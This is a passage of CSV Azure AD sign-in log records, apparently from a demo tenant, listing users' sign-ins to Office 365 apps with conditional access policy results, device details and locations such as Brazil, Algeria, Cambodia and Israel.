'2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32500b0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,7ad10e9e-8b94-4b07-9307-1c32500b0700,SigninLogs,Sucess,28,3
+1551,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,beaf469f-6020-0000-4704-a9f2ecbfbb3c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f190e8f0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,92c2001d-49e6-496a-951e-7f190e8f0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1552,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9002f8a-5390-45b8-ae37-213cf210223c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f19a28f0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,92c2001d-49e6-496a-951e-7f19a28f0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1553,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:58.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a458475-1b46-4605-a400-c7a920460895,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f191d900700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,92c2001d-49e6-496a-951e-7f191d900700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1554,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:34.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bb3cb49d-2b6f-4c1b-b35f-4b36a341823d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca7d2660800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,3006daeb-4fa9-44e4-baa4-8ca7d2660800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1555,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,451656a1-2638-4b8f-89f3-b15f5cec0d56,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db359221-fdda-4bf1-8b37-6f46e1440800,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f46e1440800,SigninLogs,Sucess,28,3
+1556,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:11.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",591f75e7-d825-4353-9817-93c84b842500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,591f75e7-d825-4353-9817-93c84b842500,SigninLogs,Sucess,32.0840416,34.88776016
+1557,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:37.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2bf3270e-b5c4-45af-b9b1-7575546ed923,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f680c335-bc78-44a8-8570-454300db0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f680c335-bc78-44a8-8570-454300db0600,SigninLogs,Sucess,13,105
+1558,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:31.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ff36d2ab-e852-4f2e-85fb-8ba01dba9c89,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure 